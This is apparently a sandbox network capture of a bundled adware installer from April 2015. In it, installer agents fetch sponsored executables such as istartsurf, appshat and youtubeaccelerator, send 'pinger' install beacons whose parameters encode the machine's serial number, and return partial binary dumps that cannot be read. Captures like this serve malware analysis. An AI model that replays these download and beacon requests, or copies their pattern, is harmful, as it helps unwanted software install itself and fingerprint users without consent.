GET /16669.ashx?e=QHucCbLl /ZRN3UqGh1U L0oSfJOuBg06UlKwaiBj2 MDmRWpWBZ0PxJo1EJGyYRjOluN4MfK81xebCnHQAai QVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlGfaDF4SP6aVUeZLRmueCpr 7rPtSKe/ E4aMYDRhnLflW3vxOK wUZAjwe0z3CnlPHRxe7sAHW6KYX3Ti/i3YMgCmKZYKupqeHrSTA7eC3FjPDFOy mdVxc7JTfzqJuQ2xNoUmVdbK77K3bmITDI9uOy dZOY5uM7AQhJgQ701L66QyS6DOQJjDeGRS0pnnebdYnK0cLSUmH4Gg7nL31GCT2C22Pl6OkQ== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:36:03 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /16669.ashx?e=XOxRKBm2zlySwLUjiBbolQYXFmKEvWT37OXLse4BafTbQC nVTu53mZVsyaCUtL66ks4x 5ewyK5EYBtUaaJ2Vte0h/YpXnsUyuixSI4KbCwH m 6Vr7WDlqmAdRyBaEVR5AawbKoxopJb8t2bI2vNjWo3KgvBPcaACykertHSHI02mIjBnQG1vlbGoI43V0s IILilpWF2ryaFrt1ZytQQr15Tmip  94khRQjb0om5r9iFtppC1uEsoMnuAcfjiugW2mv9tjm0wz0U6I70ghzFcuANGYcshuJ43h3AwCJAKCtNaB71zmlXUgaWWscg8vFDeL0Cq7BkB/XD6IlvHg== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:36:03 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS



GET /home/smt_istartsurf.exe HTTP/1.1
Range: bytes=0-
User-Agent: Better Installer(Mozilla)
Host: VVV.girlliuxiaowei.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Server: nginx
Date: Sat, 18 Apr 2015 23:35:16 GMT
Content-Type: application/octet-stream
Content-Length: 671328
Last-Modified: Wed, 15 Apr 2015 07:16:46 GMT
Connection: keep-alive
Expires: Tue, 21 Apr 2015 23:35:16 GMT
Cache-Control: max-age=259200
Content-Range: bytes 0-671327/671328
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........*...D...D.
[email protected][email protected][email protected][email protected]...
[email protected]............
[email protected]......."....
@.......................................... ..............."..`.......
[email protected]................
...............text....P.......R.................. ..`.rdata...^...p..
.`...V..............@[email protected]...$O.......,[email protected].
....... ......................@[email protected]..................
@..B..................................................................
......................................................................
......................................................................
......................................................................
............................................U..j.h.NG.d.....P....T.H.3
.P.E.d......M..E....Q...e.P......M.......E.....j.j..M..K...j.j..M.Q.M.
.K....E..........hj.j..M..n....E..x..s..M..Q....R.E.P.M.Q.~.........U.
.E......U........E..M..Q..P..E..M..Q..P.j.j..M.......E...]............
U..j.h.NG.d.....P....T.H.3.P.E.d......M..E....P.,h.....e.P......M.....
..E.....j.j..M.......M.Q..g.....P.M.......E......E..M.d......Y..].....
....U..Q.M..M..A.....]..............U..Q.M.j.j..M..=....M..E.....]..U.
.Q.M..E.P.M.....Z....E...]....U..Q.M..}..t .M......9E.r..M.......M
<<< skipped >>>


GET /pinger?event_type=offer_accepted&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=swiftrecord&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=2&index_in_screen=1&index_in_session=2&0.4368301195221277 HTTP/1.1
Accept: */*
Referer: hXXp://sub.goveba.info/downloader/thetetrisgame/thetetrisgameezsg/4a9fc2e26d3c3249b974ded373db7ae1?v=2.4&uid=4a9fc2e26d3c3249b974ded373db7ae1&muid=AD2252CE007468623BD139B0ADEC3423&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNmEgYjcgOWIgODkgMDggNDUtMjkgNzcgN2UgNDIgNzkgMTMgZmEgZGQgIEhQUU9FTSAtIDYwNDAwMDA&v2=0
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: sub.goveba.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 18 Apr 2015 23:35:11 GMT
Expires: Sat, 18 Apr 2015 20:48:31 GMT
Cache-Control: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 4da6f8793ff0878768929ba7a124e75d.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 27-xaodYnOuPDEdjcRvQmrGjL0qA_86ob0TplPTfwJRRGWSXNCAPZQ==
0..HTTP/1.1 200 OK..Content-Type: image/jpeg..Transfer-Encoding: chunk
ed..Connection: keep-alive..Server: nginx..Date: Sat, 18 Apr 2015 23:3
5:11 GMT..Expires: Sat, 18 Apr 2015 20:48:31 GMT..Cache-Control: no-ca
che..X-Cache: Miss from cloudfront..Via: 1.1 4da6f8793ff0878768929ba7a
124e75d.cloudfront.net (CloudFront)..X-Amz-Cf-Id: 27-xaodYnOuPDEdjcRvQ
mrGjL0qA_86ob0TplPTfwJRRGWSXNCAPZQ==..0......


GET /pinger?event_type=install_start&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=youtubeaccelerator&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=1&index_in_screen=1&index_in_session=1&0.9877884424624551 HTTP/1.1


Accept: */*
Referer: hXXp://sub.goveba.info/downloader/thetetrisgame/thetetrisgameezsg/4a9fc2e26d3c3249b974ded373db7ae1?v=2.4&uid=4a9fc2e26d3c3249b974ded373db7ae1&muid=AD2252CE007468623BD139B0ADEC3423&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNmEgYjcgOWIgODkgMDggNDUtMjkgNzcgN2UgNDIgNzkgMTMgZmEgZGQgIEhQUU9FTSAtIDYwNDAwMDA&v2=0
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: sub.goveba.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 18 Apr 2015 23:35:14 GMT
Expires: Sat, 18 Apr 2015 20:48:34 GMT
Cache-Control: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 4da6f8793ff0878768929ba7a124e75d.cloudfront.net (CloudFront)
X-Amz-Cf-Id: mozm9NN1bRK_ZnPdUfZDmRapypEp4OIoPL6eiBofZgkoGdR8e6wpdg==
0..HTTP/1.1 200 OK..Content-Type: image/jpeg..Transfer-Encoding: chunk
ed..Connection: keep-alive..Server: nginx..Date: Sat, 18 Apr 2015 23:3
5:14 GMT..Expires: Sat, 18 Apr 2015 20:48:34 GMT..Cache-Control: no-ca
che..X-Cache: Miss from cloudfront..Via: 1.1 4da6f8793ff0878768929ba7a
124e75d.cloudfront.net (CloudFront)..X-Amz-Cf-Id: mozm9NN1bRK_ZnPdUfZD
mRapypEp4OIoPL6eiBofZgkoGdR8e6wpdg==..0......


GET /pinger?event_type=install_complete&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=youtubeaccelerator&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=1&index_in_screen=1&index_in_session=1&0.7744544824062006 HTTP/1.1


Accept: */*
Referer: hXXp://sub.goveba.info/downloader/thetetrisgame/thetetrisgameezsg/4a9fc2e26d3c3249b974ded373db7ae1?v=2.4&uid=4a9fc2e26d3c3249b974ded373db7ae1&muid=AD2252CE007468623BD139B0ADEC3423&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNmEgYjcgOWIgODkgMDggNDUtMjkgNzcgN2UgNDIgNzkgMTMgZmEgZGQgIEhQUU9FTSAtIDYwNDAwMDA&v2=0
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: sub.goveba.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 18 Apr 2015 23:35:27 GMT
Expires: Sat, 18 Apr 2015 20:48:47 GMT
Cache-Control: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 4da6f8793ff0878768929ba7a124e75d.cloudfront.net (CloudFront)
X-Amz-Cf-Id: UgRO3sJAnFM16SWjlZHp3MmEb_WNRYpmdi8q3uA9UKIFGlv_wzaXNA==
0..HTTP/1.1 200 OK..Content-Type: image/jpeg..Transfer-Encoding: chunk
ed..Connection: keep-alive..Server: nginx..Date: Sat, 18 Apr 2015 23:3
5:27 GMT..Expires: Sat, 18 Apr 2015 20:48:47 GMT..Cache-Control: no-ca
che..X-Cache: Miss from cloudfront..Via: 1.1 4da6f8793ff0878768929ba7a
124e75d.cloudfront.net (CloudFront)..X-Amz-Cf-Id: QS9OBhDmQs7ueqb0wHUO
cRIQMWN47yW9LNfNfiSbIBy-lzljDqiQQA==..0......


GET /pinger?event_type=install_fail&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=swiftrecord&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=2&index_in_screen=1&index_in_session=2&0.7535562975350745 HTTP/1.1


Accept: */*
Referer: hXXp://sub.goveba.info/downloader/thetetrisgame/thetetrisgameezsg/4a9fc2e26d3c3249b974ded373db7ae1?v=2.4&uid=4a9fc2e26d3c3249b974ded373db7ae1&muid=AD2252CE007468623BD139B0ADEC3423&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNmEgYjcgOWIgODkgMDggNDUtMjkgNzcgN2UgNDIgNzkgMTMgZmEgZGQgIEhQUU9FTSAtIDYwNDAwMDA&v2=0
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: sub.goveba.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 18 Apr 2015 23:35:40 GMT
Expires: Sat, 18 Apr 2015 20:49:00 GMT
Cache-Control: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 4da6f8793ff0878768929ba7a124e75d.cloudfront.net (CloudFront)
X-Amz-Cf-Id: kDBDpc-70nZu4XDckowvY8dHv0xyzlL0VUE65kM0Bcbmh1TK7301Zw==
0..HTTP/1.1 200 OK..Content-Type: image/jpeg..Transfer-Encoding: chunk
ed..Connection: keep-alive..Server: nginx..Date: Sat, 18 Apr 2015 23:3
5:40 GMT..Expires: Sat, 18 Apr 2015 20:49:00 GMT..Cache-Control: no-ca
che..X-Cache: Miss from cloudfront..Via: 1.1 4da6f8793ff0878768929ba7a
124e75d.cloudfront.net (CloudFront)..X-Amz-Cf-Id: kDBDpc-70nZu4XDckowv
Y8dHv0xyzlL0VUE65kM0Bcbmh1TK7301Zw==..0......


GET /pinger?event_type=install_start&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=istartsurf&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=3&index_in_screen=1&index_in_session=3&0.4544383880033461 HTTP/1.1


Accept: */*
Referer: hXXp://sub.goveba.info/downloader/thetetrisgame/thetetrisgameezsg/4a9fc2e26d3c3249b974ded373db7ae1?v=2.4&uid=4a9fc2e26d3c3249b974ded373db7ae1&muid=AD2252CE007468623BD139B0ADEC3423&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNmEgYjcgOWIgODkgMDggNDUtMjkgNzcgN2UgNDIgNzkgMTMgZmEgZGQgIEhQUU9FTSAtIDYwNDAwMDA&v2=0
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: sub.goveba.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 18 Apr 2015 23:35:42 GMT
Expires: Sat, 18 Apr 2015 20:49:02 GMT
Cache-Control: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 4da6f8793ff0878768929ba7a124e75d.cloudfront.net (CloudFront)
X-Amz-Cf-Id: xz4rNSDuYRl4-HKmunOxXqAvL-bByjWITNi9TP_y8ZEpcecMi9cCug==
0..HTTP/1.1 200 OK..Content-Type: image/jpeg..Transfer-Encoding: chunk
ed..Connection: keep-alive..Server: nginx..Date: Sat, 18 Apr 2015 23:3
5:42 GMT..Expires: Sat, 18 Apr 2015 20:49:02 GMT..Cache-Control: no-ca
che..X-Cache: Miss from cloudfront..Via: 1.1 4da6f8793ff0878768929ba7a
124e75d.cloudfront.net (CloudFront)..X-Amz-Cf-Id: xz4rNSDuYRl4-HKmunOx
XqAvL-bByjWITNi9TP_y8ZEpcecMi9cCug==..0......


GET /pinger?event_type=install_complete&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=istartsurf&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=3&index_in_screen=1&index_in_session=3&0.6547741639866222 HTTP/1.1


Accept: */*
Referer: hXXp://sub.goveba.info/downloader/thetetrisgame/thetetrisgameezsg/4a9fc2e26d3c3249b974ded373db7ae1?v=2.4&uid=4a9fc2e26d3c3249b974ded373db7ae1&muid=AD2252CE007468623BD139B0ADEC3423&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNmEgYjcgOWIgODkgMDggNDUtMjkgNzcgN2UgNDIgNzkgMTMgZmEgZGQgIEhQUU9FTSAtIDYwNDAwMDA&v2=0
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: sub.goveba.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 18 Apr 2015 23:36:24 GMT
Expires: Sat, 18 Apr 2015 20:49:44 GMT
Cache-Control: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 4da6f8793ff0878768929ba7a124e75d.cloudfront.net (CloudFront)
X-Amz-Cf-Id: l2YlX16VC4g11qTC075vAtWucubOU_BgMe5QNtr8YHFHGJfDHK5JWQ==
0......


GET /pinger?event_type=install_start&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=appshat_madness&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=4&index_in_screen=1&index_in_session=4&0.7184957306003938 HTTP/1.1


Accept: */*
Referer: hXXp://sub.goveba.info/downloader/thetetrisgame/thetetrisgameezsg/4a9fc2e26d3c3249b974ded373db7ae1?v=2.4&uid=4a9fc2e26d3c3249b974ded373db7ae1&muid=AD2252CE007468623BD139B0ADEC3423&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNmEgYjcgOWIgODkgMDggNDUtMjkgNzcgN2UgNDIgNzkgMTMgZmEgZGQgIEhQUU9FTSAtIDYwNDAwMDA&v2=0
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: sub.goveba.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 18 Apr 2015 23:36:24 GMT
Expires: Sat, 18 Apr 2015 20:49:44 GMT
Cache-Control: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 4da6f8793ff0878768929ba7a124e75d.cloudfront.net (CloudFront)
X-Amz-Cf-Id: pSVyLzd82pJzHOe6yYaNUEvFnkVCx3R3Axz9xVFO-HYKVVndARooqA==
0..HTTP/1.1 200 OK..Content-Type: image/jpeg..Transfer-Encoding: chunk
ed..Connection: keep-alive..Server: nginx..Date: Sat, 18 Apr 2015 23:3
6:24 GMT..Expires: Sat, 18 Apr 2015 20:49:44 GMT..Cache-Control: no-ca
che..X-Cache: Miss from cloudfront..Via: 1.1 4da6f8793ff0878768929ba7a
124e75d.cloudfront.net (CloudFront)..X-Amz-Cf-Id: pSVyLzd82pJzHOe6yYaN
UEvFnkVCx3R3Axz9xVFO-HYKVVndARooqA==..0......


GET /pinger?event_type=install_complete&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=appshat_madness&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=4&index_in_screen=1&index_in_session=4&0.36330831864320045 HTTP/1.1


Accept: */*
Referer: hXXp://sub.goveba.info/downloader/thetetrisgame/thetetrisgameezsg/4a9fc2e26d3c3249b974ded373db7ae1?v=2.4&uid=4a9fc2e26d3c3249b974ded373db7ae1&muid=AD2252CE007468623BD139B0ADEC3423&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNmEgYjcgOWIgODkgMDggNDUtMjkgNzcgN2UgNDIgNzkgMTMgZmEgZGQgIEhQUU9FTSAtIDYwNDAwMDA&v2=0
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: sub.goveba.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 18 Apr 2015 23:36:40 GMT
Expires: Sat, 18 Apr 2015 20:50:00 GMT
Cache-Control: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 4da6f8793ff0878768929ba7a124e75d.cloudfront.net (CloudFront)
X-Amz-Cf-Id: KNKehUMow4Don--1LXwW-zU_HeV4-x9599XFzmRkDBCD9OyBRYiEVQ==
0..HTTP/1.1 200 OK..Content-Type: image/jpeg..Transfer-Encoding: chunk
ed..Connection: keep-alive..Server: nginx..Date: Sat, 18 Apr 2015 23:3
6:40 GMT..Expires: Sat, 18 Apr 2015 20:50:00 GMT..Cache-Control: no-ca
che..X-Cache: Miss from cloudfront..Via: 1.1 4da6f8793ff0878768929ba7a
124e75d.cloudfront.net (CloudFront)..X-Amz-Cf-Id: KNKehUMow4Don--1LXwW
-zU_HeV4-x9599XFzmRkDBCD9OyBRYiEVQ==..0..



GET /mirror/nerocrossrider/appshat_generic.exe HTTP/1.1
Range: bytes=71390-
User-Agent: Better Installer(Mozilla)
Host: d3hm9b8fv0d908.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 214168
Connection: keep-alive
Date: Sun, 12 Apr 2015 05:05:02 GMT
x-amz-version-id: zdbgB_7owwl7Hq6LIKQBG0yBaPWISKtC
x-amz-meta-s3cmd-attrs: uid:500/gname:www/uname:www/gid:500/mode:33204/mtime:1415096893/atime:1415097003/ctime:1415096894
Cache-Control: max-age=3600
Last-Modified: Tue, 04 Nov 2014 11:01:28 GMT
ETag: "518879abe3170dabd172dfffcd165598"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 71390-285557/285558
Age: 3017
X-Cache: Hit from cloudfront
Via: 1.1 2636148dc4ff819fda62f785a179ffd2.cloudfront.net (CloudFront)
X-Amz-Cf-Id: J-Rw5AF8a__4Gav7mtcW7cKFnCd9mYil0xKUfLt7_L81-aVHgwyH7w==
..IK.#.ikv7..=....\z....if.J^.;,5!.._...MR..w.OX..&.....p:.........5.L
.iT.L.O.....7D.]b..........3.. 2=v.a.....^k....xp .`..y.1>...A.Q!..
._.J.D.......j..].8v....>.P.\ei%..OU[.V.p.*ky..E*.D0).-l.B.....*..a
G.b^..T.yqu8.Np.'.Z&V`..-..2l..Bu.l ........4X.U..9p..}E|..J...".m..:.
[email protected]$h...8D.s"..]......3.. .$..H.Sf.z.....q.Ke.....b.......
IO[[email protected].....].<.........g.mG.
.as..ez|.C.......=p.^U|.`s6.).\).]........2j.....N....a...i\.m.<...
...8......z....=....i.s.2...r...n.=h.D".O.MN..a.S..f. .S.i....N>.O;
...>..4%.{.L....... m.....%.Hw.U<...."...ns.Z....).)`o:....O....
0..SDt..|V.G...iU.d P..x..{`i[.X.Uh..@..`C...;6.\..y.]-W.... ...G9`.%i
~.G.......r#`...`...G....Z..KQA~'vL2XAM..(o......jU.....3........7...o
[email protected].`....u...G......H.N.|..;#..G.n]J.Kx......t.if
.8u.^....L..L..;..# 6...p ...........U..KU%....F...>....L.sZ.Cm.!..
cllj...&.:......p..y.....ds_.....W..t2.,.I...Z..c.T?/&O...8..q..<:C
p.....7&.D7.....e,2.)..G..FP.l. .N....(......I.......4&...8.1;...M...=
.2..%;.V).>[email protected].!..GHUZ.nnh..........n#.....F.v.S...Z
y.m..........;..k...3..(. .k.............,H.D.L.....K...`[.. C..7X.uq.
zV.t...m..`..H.....s.e..R.7...4.F..`.b!..N.pY...=%K...s.Tt*9.rR..A....
xt.hR.k..25...=`...7.........&=....vK.A...4.d7y.....(....7.(..l.k...h.
C.w|..yP..#...lNI..\8....c...I&.h.[.=p... ...._......).;.>"@.....@.
n@..)...,....80.W......kh..z8.......W3S..E...3..H....^.t.L.\........3G
..b.....!.^....U......d..k.X...84P..%V........O._.rg.7.g..`G4.$u.x
<<< skipped >>>


GET /installers/bi_downloader/1429398342407/setup.exe HTTP/1.0
Host: sub.reasoninghollow.com
User-Agent: Somoto Binno 2.0


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 428296
Connection: close
Server: nginx
Date: Sat, 18 Apr 2015 23:05:59 GMT
Last-Modified: Sat, 18 Apr 2015 23:05:43 GMT
ETag: "5532e347-68908"
Expires: Sat, 18 Apr 2015 23:15:59 GMT
Cache-Control: max-age=600
Accept-Ranges: bytes
Age: 440
X-Cache: Hit from cloudfront
Via: 1.1 b274d1d9cbf8e572c32879f40e27c373.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Az1B9ihggE3P5KB-0FShYrPrGhW9lRimoEmRRogaYWCr0cqEsoWU5w==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................0...............................................s.
.........pD..........p................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
rc...pD.......F...v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>


GET /yta33_full.exe HTTP/1.1
Range: bytes=250000-499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:17 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 250000-499999/7590800
....A.^......i.|@....M|.4y..F.S.}..&a.D8...."R.R.C..9....S.0u.R.&...T$
9R;.%...o....vUm....NE.d. .5%.... .......T..sM..Qx ...[|Cf...ne.$..|Zv
'.k.M.\d.&....*\H..`i.{?...9u'.....q........YK.T.Csj1......2.YHsL.....
.l..f........f@[email protected]..\.l....sL..).^..cJ.G../. ....%O...-.^.S.
.TFM...{1.X.....X..WT./...x..$..6.%0`...U.2..w5.B...o.#...0...-WXTl...
...H.dEcP4...S-qn}Z..n...>".p..@....~cE.0.b... R.5.&.........eD.ig.
PV..wo..T.~.....R9.....zR^v...W..t.H.%}.U.~...Y.|(g..&.(xj.....<. I
!........Y....u[@.`............u......C8.6...`..0.......[........0...^
............y......j.!.H.....L.z^o.....4.;.5:RLz.l.p...s...*f.e<.#.
.....#...~....U).1G"`...n.........<...0;..h...#....h.....".o.NW".(.
,.N..t.......^Z..%.I.&.VW..O....<..i..C.av.\*.v..d..5...#.=0>x..
n...#pYH.)8d...B..m.R'p. .......]...3.j....c.....[.S......J...G.!.[...
hh....D..Q.....f:=C....f.R.o.....j..|..T>.5?;.1.......@H.[.h.eS.0..
.. .(y.....7...h|.$..4...1.....K..;G.{.'..:..t.[ld..C..n;>.(V...P..
........C.........7H. .W..ckrZ...w...=....S....!E.8....^.....k.X...$..
.9..}... ..{.....]. n.....6..i....o.{[email protected].$.
..H}...^).v....'.....H.....x.yH...E9.V.Q).N.$X...\......GG.|sJ..R.....
7.._.b......x$......?.U.g.g$....)..E..[)..h..k .L ..a.\[email protected].:..
